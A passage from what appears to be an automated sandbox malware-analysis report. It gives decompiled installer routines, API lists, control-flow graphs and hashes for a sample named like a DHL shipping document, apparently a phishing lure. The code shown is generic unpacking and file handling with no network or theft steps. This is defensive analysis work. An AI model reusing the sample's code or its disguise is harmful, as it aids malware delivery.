                        								__ecx = _v16;
                        								__ebx = __ebx + __ebx;
                        								_v20 = _v20 >> 1;
                        								__eflags = _v16 - _v20;
                        								_v72 = __ebx;
                        								if(_v16 >= _v20) {
                        									__ecx = _v20;
                        									_v16 = _v16 - _v20;
                        									__ebx = __ebx | 0x00000001;
                        									__eflags = __ebx;
                        									_v72 = __ebx;
                        								}
                        								__eflags = _v20 - 0x1000000;
                        								if(_v20 >= 0x1000000) {
                        									L104:
                        									_t344 =  &_v76;
                        									 *_t344 = _v76 - 1;
                        									__eflags =  *_t344;
                        									goto L105;
                        								} else {
                        									goto L102;
                        								}
                        							}
                        							__edx = _v8;
                        							__eax = __eax - __ebx;
                        							_v68 = __ecx;
                        							__eax = _v8 + 0x55e + __eax * 2;
                        							goto L111;
                        						case 0x1a:
                        							L58:
                        							__eflags = _v104;
                        							if(_v104 == 0) {
                        								_v140 = 0x1a;
                        								goto L173;
                        							}
                        							__ecx = _v108;
                        							__al = _v96;
                        							__edx = _v12;
                        							_v100 = _v100 + 1;
                        							_v108 = _v108 + 1;
                        							_v104 = _v104 - 1;
                        							 *_v108 = __al;
                        							__ecx = _v24;
                        							 *(_v12 + __ecx) = __al;
                        							__eax = __ecx + 1;
                        							__edx = 0;
                        							_t197 = __eax % _v120;
                        							__eax = __eax / _v120;
                        							__edx = _t197;
                        							goto L82;
                        						case 0x1b:
                        							L78:
                        							__eflags = _v104;
                        							if(_v104 == 0) {
                        								_v140 = 0x1b;
                        								goto L173;
                        							}
                        							__eax = _v24;
                        							__eax = _v24 - _v48;
                        							__eflags = __eax - _v120;
                        							if(__eax >= _v120) {
                        								__eax = __eax + _v120;
                        								__eflags = __eax;
                        							}
                        							__edx = _v12;
                        							__cl =  *(__edx + __eax);
                        							__eax = _v24;
                        							_v96 = __cl;
                        							 *(__edx + __eax) = __cl;
                        							__eax = __eax + 1;
                        							__edx = 0;
                        							_t280 = __eax % _v120;
                        							__eax = __eax / _v120;
                        							__edx = _t280;
                        							__eax = _v108;
                        							_v100 = _v100 + 1;
                        							_v108 = _v108 + 1;
                        							_t289 =  &_v104;
                        							 *_t289 = _v104 - 1;
                        							__eflags =  *_t289;
                        							 *_v108 = __cl;
                        							L82:
                        							_v24 = __edx;
                        							goto L83;
                        						case 0x1c:
                        							while(1) {
                        								L126:
                        								__eflags = _v104;
                        								if(_v104 == 0) {
                        									break;
                        								}
                        								__eax = _v24;
                        								__eax = _v24 - _v48;
                        								__eflags = __eax - _v120;
                        								if(__eax >= _v120) {
                        									__eax = __eax + _v120;
                        									__eflags = __eax;
                        								}
                        								__edx = _v12;
                        								__cl =  *(__edx + __eax);
                        								__eax = _v24;
                        								_v96 = __cl;
                        								 *(__edx + __eax) = __cl;
                        								__eax = __eax + 1;
                        								__edx = 0;
                        								_t420 = __eax % _v120;
                        								__eax = __eax / _v120;
                        								__edx = _t420;
                        								__eax = _v108;
                        								_v108 = _v108 + 1;
                        								_v104 = _v104 - 1;
                        								_v52 = _v52 - 1;
                        								__eflags = _v52;
                        								 *_v108 = __cl;
                        								_v24 = _t420;
                        								if(_v52 > 0) {
                        									continue;
                        								} else {
                        									L83:
                        									_v140 = 2;
                        									goto L3;
                        								}
                        							}
                        							_v140 = 0x1c;
                        							L173:
                        							_push(0x22);
                        							_pop(_t574);
                        							memcpy(_v148,  &_v140, _t574 << 2);
                        							return 0;
                        					}
                        				}
                        				L174:
                        				_t538 = _t537 | 0xffffffff;
                        				return _t538;
                        			}

                        0x00406e23
                        0x00000000
                        0x00000000
                        0x00406e29
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e60
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e93
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406e9c
                        0x00406ea3
                        0x00406ea6
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eb1
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed6
                        0x00406ed6
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x00000000
                        0x00000000
                        0x00407395
                        0x00407399
                        0x004073bb
                        0x004073be
                        0x004073c8
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x0040739b
                        0x0040739e
                        0x004073a2
                        0x004073a5
                        0x004073a5
                        0x004073a8
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00407489
                        0x00407489
                        0x00000000
                        0x00407489
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x004073ac
                        0x004073ac
                        0x004073af
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407546
                        0x00000000
                        0x00000000
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00407194
                        0x00407197
                        0x0040719a
                        0x0040719c
                        0x0040719e
                        0x0040719e
                        0x0040719f
                        0x004071a2
                        0x004071a9
                        0x004071ac
                        0x004071ba
                        0x00000000
                        0x00000000
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x00000000
                        0x0040749f
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x00000000
                        0x004075db
                        0x004074a9
                        0x004074ac
                        0x004074af
                        0x004074b3
                        0x004074b6
                        0x004074bc
                        0x004074be
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c7
                        0x004074c7
                        0x004074cb
                        0x0040752b
                        0x0040752e
                        0x00407533
                        0x00407534
                        0x00407536
                        0x00407538
                        0x0040753b
                        0x00407447
                        0x00407447
                        0x00000000
                        0x00407447
                        0x004074cd
                        0x004074d3
                        0x004074d6
                        0x004074d9
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074eb
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x0040750d
                        0x00407510
                        0x00407514
                        0x00407516
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074f8
                        0x004074fd
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x0040751d
                        0x00407524
                        0x00000000
                        0x00407526
                        0x00000000
                        0x00407526
                        0x00000000
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x004075e5
                        0x004075eb
                        0x004075ed
                        0x004075f4
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000

                        Strings
                        • codeIncrementalHandleCreate, xrefs: 00406BB0
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID: codeIncrementalHandleCreate
                        • API String ID: 0-1664959861
                        • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                        • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                        • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                        • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 579 403479-4034a1 GetTickCount 580 4035d1-4035d9 call 40302e 579->580 581 4034a7-4034d2 call 4035f8 SetFilePointer 579->581 586 4035db-4035df 580->586 587 4034d7-4034e9 581->587 588 4034eb 587->588 589 4034ed-4034fb call 4035e2 587->589 588->589 592 403501-40350d 589->592 593 4035c3-4035c6 589->593 594 403513-403519 592->594 593->586 595 403544-403560 call 406bb0 594->595 596 40351b-403521 594->596 602 403562-40356a 595->602 603 4035cc 595->603 596->595 597 403523-403543 call 40302e 596->597 597->595 605 40356c-403574 call 40620a 602->605 606 40358d-403593 602->606 604 4035ce-4035cf 603->604 604->586 610 403579-40357b 605->610 606->603 607 403595-403597 606->607 607->603 609 403599-4035ac 607->609 609->587 611 4035b2-4035c1 SetFilePointer 609->611 612 4035c8-4035ca 610->612 613 40357d-403589 610->613 611->580 612->604 613->594 614 40358b 613->614 614->609
                        C-Code - Quality: 93%
                        			E00403479(intOrPtr _a4) {
                        				intOrPtr _t11;
                        				signed int _t12;
                        				void* _t14;
                        				void* _t15;
                        				long _t16;
                        				void* _t18;
                        				intOrPtr _t31;
                        				intOrPtr _t34;
                        				intOrPtr _t36;
                        				void* _t37;
                        				intOrPtr _t49;
                        
                        				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                        				 *0x42a26c = GetTickCount() + 0x1f4;
                        				if(_t34 <= 0) {
                        					L22:
                        					E0040302E(1);
                        					return 0;
                        				}
                        				E004035F8( *0x420f04);
                        				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                        				 *0x420f00 = _t34;
                        				 *0x420ef0 = 0;
                        				while(1) {
                        					_t31 = 0x4000;
                        					_t11 =  *0x420ef8 -  *0x420f04;
                        					if(_t11 <= 0x4000) {
                        						_t31 = _t11;
                        					}
                        					_t12 = E004035E2(0x414ef0, _t31);
                        					if(_t12 == 0) {
                        						break;
                        					}
                        					 *0x420f04 =  *0x420f04 + _t31;
                        					 *0x40ce80 = 0x414ef0;
                        					 *0x40ce84 = _t31;
                        					L6:
                        					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                        						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                        						E0040302E(0);
                        					}
                        					 *0x40ce88 = 0x40cef0;
                        					 *0x40ce8c = 0x8000; // executed
                        					_t14 = E00406BB0(0x40ce68); // executed
                        					if(_t14 < 0) {
                        						goto L20;
                        					}
                        					_t36 =  *0x40ce88; // 0x40facf
                        					_t37 = _t36 - 0x40cef0;
                        					if(_t37 == 0) {
                        						__eflags =  *0x40ce84; // 0x0
                        						if(__eflags != 0) {
                        							goto L20;
                        						}
                        						__eflags = _t31;
                        						if(_t31 == 0) {
                        							goto L20;
                        						}
                        						L16:
                        						_t16 =  *0x420ef4;
                        						if(_t16 -  *0x40ce60 + _a4 > 0) {
                        							continue;
                        						}
                        						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                        						goto L22;
                        					}
                        					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                        					if(_t18 == 0) {
                        						_push(0xfffffffe);
                        						L21:
                        						_pop(_t15);
                        						return _t15;
                        					}
                        					 *0x40ce60 =  *0x40ce60 + _t37;
                        					_t49 =  *0x40ce84; // 0x0
                        					if(_t49 != 0) {
                        						goto L6;
                        					}
                        					goto L16;
                        					L20:
                        					_push(0xfffffffd);
                        					goto L21;
                        				}
                        				return _t12 | 0xffffffff;
                        			}















                        APIs
                        • GetTickCount.KERNEL32 ref: 0040348D
                          • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FilePointer$CountTick
                        • String ID: codeIncrementalHandleCreate
                        • API String ID: 1092082344-1664959861
                        • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                        • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                        • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                        • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 615 406187-406193 616 406194-4061c8 GetTickCount GetTempFileNameW 615->616 617 4061d7-4061d9 616->617 618 4061ca-4061cc 616->618 620 4061d1-4061d4 617->620 618->616 619 4061ce 618->619 619->620
                        C-Code - Quality: 100%
                        			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                        				intOrPtr _v8;
                        				short _v12;
                        				short _t12;
                        				intOrPtr _t13;
                        				signed int _t14;
                        				WCHAR* _t17;
                        				signed int _t19;
                        				signed short _t23;
                        				WCHAR* _t26;
                        
                        				_t26 = _a4;
                        				_t23 = 0x64;
                        				while(1) {
                        					_t12 =  *L"nsa"; // 0x73006e
                        					_t23 = _t23 - 1;
                        					_v12 = _t12;
                        					_t13 =  *0x40a5ac; // 0x61
                        					_v8 = _t13;
                        					_t14 = GetTickCount();
                        					_t19 = 0x1a;
                        					_v8 = _v8 + _t14 % _t19;
                        					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                        					if(_t17 != 0) {
                        						break;
                        					}
                        					if(_t23 != 0) {
                        						continue;
                        					} else {
                        						 *_t26 =  *_t26 & _t23;
                        					}
                        					L4:
                        					return _t17;
                        				}
                        				_t17 = _t26;
                        				goto L4;
                        			}













                        APIs
                        • GetTickCount.KERNEL32 ref: 004061A5
                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CountFileNameTempTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                        • API String ID: 1716503409-1968954121
                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                        • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                        • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 621 403c25-403c34 622 403c40-403c48 621->622 623 403c36-403c39 CloseHandle 621->623 624 403c54-403c60 call 403c82 call 405d74 622->624 625 403c4a-403c4d CloseHandle 622->625 623->622 629 403c65-403c66 624->629 625->624
                        C-Code - Quality: 100%
                        			E00403C25() {
                        				void* _t1;
                        				void* _t2;
                        				void* _t4;
                        				signed int _t11;
                        
                        				_t1 =  *0x40a018; // 0xffffffff
                        				if(_t1 != 0xffffffff) {
                        					CloseHandle(_t1);
                        					 *0x40a018 =  *0x40a018 | 0xffffffff;
                        				}
                        				_t2 =  *0x40a01c; // 0xffffffff
                        				if(_t2 != 0xffffffff) {
                        					CloseHandle(_t2);
                        					 *0x40a01c =  *0x40a01c | 0xffffffff;
                        					_t11 =  *0x40a01c;
                        				}
                        				E00403C82();
                        				_t4 = E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsl9995.tmp\\", 7); // executed
                        				return _t4;
                        			}








                        APIs
                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                        Strings
                        • C:\Users\user\AppData\Local\Temp\nsl9995.tmp\, xrefs: 00403C5B
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsl9995.tmp\
                        • API String ID: 2962429428-2482436076
                        • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                        • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                        • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                        • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 713 4015c1-4015d5 call 402da6 call 405fe2 718 401631-401634 713->718 719 4015d7-4015ea call 405f64 713->719 720 401663-4022f6 call 401423 718->720 721 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 718->721 726 401604-401607 call 405c16 719->726 727 4015ec-4015ef 719->727 737 402c2a-402c39 720->737 738 40292e-402935 720->738 721->737 740 40165b-40165e 721->740 736 40160c-40160e 726->736 727->726 730 4015f1-4015f8 call 405c33 727->730 730->726 744 4015fa-4015fd call 405b99 730->744 742 401610-401615 736->742 743 401627-40162f 736->743 738->737 740->737 746 401624 742->746 747 401617-401622 GetFileAttributesW 742->747 743->718 743->719 749 401602 744->749 746->743 747->743 747->746 749->736
                        C-Code - Quality: 86%
                        			E004015C1(short __ebx, void* __eflags) {
                        				void* _t17;
                        				int _t23;
                        				void* _t25;
                        				signed char _t26;
                        				short _t28;
                        				short _t31;
                        				short* _t34;
                        				void* _t36;
                        
                        				_t28 = __ebx;
                        				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                        				_t17 = E00405FE2(_t16);
                        				_t32 = _t17;
                        				if(_t17 != __ebx) {
                        					do {
                        						_t34 = E00405F64(_t32, 0x5c);
                        						_t31 =  *_t34;
                        						 *_t34 = _t28;
                        						if(_t31 != _t28) {
                        							L5:
                        							_t25 = E00405C16( *(_t36 + 8));
                        						} else {
                        							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                        							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                        								goto L5;
                        							} else {
                        								_t25 = E00405B99( *(_t36 + 8)); // executed
                        							}
                        						}
                        						if(_t25 != _t28) {
                        							if(_t25 != 0xb7) {
                        								L9:
                        								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                        							} else {
                        								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                        								if((_t26 & 0x00000010) == 0) {
                        									goto L9;
                        								}
                        							}
                        						}
                        						 *_t34 = _t31;
                        						_t32 = _t34 + 2;
                        					} while (_t31 != _t28);
                        				}
